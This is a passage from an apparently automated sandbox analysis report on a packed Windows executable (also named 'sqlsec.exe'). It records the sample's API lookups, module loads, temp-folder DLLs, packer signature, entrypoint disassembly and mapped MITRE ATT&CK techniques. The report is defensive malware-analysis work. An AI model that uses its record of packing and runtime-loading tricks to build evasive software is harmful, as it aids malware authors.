\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1c001d00091a1a00@ntdll.dll\"\n \"1c001d00291a1a00@ntdll.dll\"\n \"0b000c00491a1a00@ntdll.dll\"\n \"06000700571a1a00@ntdll.dll\"\n \"11001200611a1a00@ntdll.dll\"\n \"0b000c00751a1a00@ntdll.dll\"\n \"0f001000831a1a00@ntdll.dll\"\n \"0f001000951a1a00@ntdll.dll\"\n \"18001900a71a1a00@ntdll.dll\"\n \"10001100c31a1a00@ntdll.dll\"\n \"19001a00d71a1a00@ntdll.dll\"\n \"17001800f31a1a00@ntdll.dll\"\n \"070008000d1b1a00@ntdll.dll\"\n \"14001500171b1a00@ntdll.dll\"\n \"140015002f1b1a00@ntdll.dll\"\n \"11001200471b1a00@ntdll.dll\"\n \"140015005b1b1a00@ntdll.dll\"\n \"11001200731b1a00@ntdll.dll\"\n \"14001500871b1a00@ntdll.dll\"\n \"280029009f1b1a00@ntdll.dll\"\n \"16001700cb1b1a00@ntdll.dll\"\n \"26002700e51b1a00@ntdll.dll\"\n \"150016000f1c1a00@ntdll.dll\"\n \"0a000b00271c1a00@ntdll.dll\"\n \"15001600351c1a00@ntdll.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ff0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"KERNEL32\" at base 778c0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bef0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"ADVAPI32.DLL\" at base 75e70000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"SHLWAPI.DLL\" at base 75d90000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"VERSION.DLL\" at base 74ea0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"USER32.DLL\" at base 76810000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"RPCRT4.DLL\" at base 76940000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"KERNEL32.DLL\" at base 778c0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"CRYPTBASE.DLL\" at base 75900000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74820000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"OLE32.DLL\" at base 779a0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76210000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"PROFAPI.DLL\" at base 75a20000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"CRYPTSP.DLL\" at base 75410000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 751a0000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"DWMAPI.DLL\" at base 74140000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an writable section named \".text\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an writable section named \".sedata\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an writable section named \".idata\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an writable section named \".rsrc\"\n \"sqlsec.exe\" has an writable section named \".text\"\n \"sqlsec.exe\" has an writable section named \".sedata\"\n \"sqlsec.exe\" has an writable section named \".idata\"\n \"sqlsec.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an executable section named \".text\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an executable section named \".sedata\"\n \"sqlsec.exe\" has an executable section named \".text\"\n \"sqlsec.exe\" has an executable section named \".sedata\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69470000\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69C20000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 64730000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75520000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\50708522-b6c8-4268-81f4-24be66e45f5b\"\n \"Local\\50708522-b6c8-4268-81f4-24be66e45f5b\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" was detected as \"Safengine Shielden\" and name: \"Protector\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"sqlsec.exe\" was detected as \"Safengine Shielden\" and name: \"Protector\"\n \"sqlsec.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"sqlsec.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" file has an entrypoint instructions - \"call\t0x537bde,push\tebx,popal\t,outsb\tdx, byte ptr gs:[esi],imul\tebp, dword ptr [bp + 0x65], 0x69685320,insb\tbyte ptr es:[edi], dx,outsb\tdx, byte ptr gs:[esi],and\tbyte ptr [esi + 0x32], dh,xor\tebp, dword ptr cs:[esi],cmp\tdword ptr [esi], ebp,xor\tbyte ptr [eax], al,jmp\t0x537a54,add\tesp, 0xe,lea\tebx, [ecx + edi],mov\tbyte ptr [esp + 0x13], ch,pop\tdword ptr [esp],neg\tebx,call\t0x537c13,sbb\tal, 0x6f,mov\tbl, ch,jmp\t0x537be3,bswap\tebx,push\tcx,cld\t,mov\tbx, bp,sub\tesp, 0xe,call\t0x537c19,jbe\t0x537c70,mov\tal, byte ptr [0x86751ae3],pop\tesp,and\tal, 3,jmp\t0x537bfd,pop\tesi,jmp\t0x537c46,not\tsi,\"\n \"sqlsec.exe\" file has an entrypoint instructions - \"call\t0x537bde,push\tebx,popal\t,outsb\tdx, byte ptr gs:[esi],imul\tebp, dword ptr [bp + 0x65], 0x69685320,insb\tbyte ptr es:[edi], dx,outsb\tdx, byte ptr gs:[esi],and\tbyte ptr [esi + 0x32], dh,xor\tebp, dword ptr cs:[esi],cmp\tdword ptr [esi], ebp,xor\tbyte ptr [eax], al,jmp\t0x537a54,add\tesp, 0xe,lea\tebx, [ecx + edi],mov\tbyte ptr [esp + 0x13], ch,pop\tdword ptr [esp],neg\tebx,call\t0x537c13,sbb\tal, 0x6f,mov\tbl, ch,jmp\t0x537be3,bswap\tebx,push\tcx,cld\t,mov\tbx, bp,sub\tesp, 0xe,call\t0x537c19,jbe\t0x537c70,mov\tal, byte ptr [0x86751ae3],pop\tesp,and\tal, 3,jmp\t0x537bfd,pop\tesi,jmp\t0x537c46,not\tsi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" was detected as \"Safengine Shielden v2.1.6.0\"\n \"sqlsec.exe\" was detected as \"Safengine Shielden v2.1.6.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\mscoree.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\mscoree.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\IPHLPAPI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\IPHLPAPI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\system32\\mscoree.dll.local\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mscoree.dll.local\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe.config\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Client\\\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.INI\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe.Local\\\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe:Zone.Identifier\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8E49A7B584B8035AF0B605397A6F34BD1B7BD658914CE169833D1D072298EEE3.EXE.CONFIG\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\CLIENT\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8E49A7B584B8035AF0B605397A6F34BD1B7BD658914CE169833D1D072298EEE3.INI\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC\\PUBLISHERPOLICY.TME\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\8E49A7B584B8035AF0B605397A6F34BD1B7BD658914CE169833D1D072298EEE3.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\mscoree.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": 